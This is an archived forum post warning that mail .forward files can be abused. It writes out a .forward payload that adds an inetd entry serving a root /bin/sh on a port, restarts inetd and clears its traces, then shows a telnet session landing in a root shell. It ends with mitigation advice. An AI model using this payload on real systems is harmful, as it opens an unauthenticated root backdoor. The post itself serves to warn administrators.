This is an archived low-energy page for bots and other anonmyous visitors. Please sign up if you are a human and want to interact.

This is pretty scary. While you could do something like this with a suid C wrapper, what if i (evil malicious user) added the following lines to root's .forward file:

"exec echo vboxd stream    tcp    nowait    root    /usr/sbin/tcpd /bi
+n/sh >> /etc/inetd.conf && kill -HUP `cat /var/run/inet.pid` && echo 
+> /root/.forward"
[download]

Then i send an email to root, and i have a root shell listening on port 20012:

jed:~$ telnet guinness 20012
Trying x.x.x.x...
Connected to guinness
Escape character is '^]'.
echo $UID
0
echo $PWD
/
[download]

This is a bad thing. and exploits like this have been around for a while, since mail blindly executes the .forward / .vacation files. The best bet is to use the forwarding/vacation mechanism in your mail server itself. You could make your aliases(5) file writable by your httpd process. Or even better, the cgi could just dump it's output to some flat file somewhere, where a cronjob (which runs every five minutes) would parse it, do some reality checking on the data, and then decide whether or not to proceed from there.

Sorry for the rant (and the non-perl related post), but .forward files are such a huge security hole.

BlueLines

Disclaimer: This post may contain inaccurate information, be habit forming, cause atomic warfare between peaceful countries, speed up male pattern baldness, interfere with your cable reception, exile you from certain third world countries, ruin your marriage, and generally spoil your day. No batteries included, no strings attached, your mileage may vary.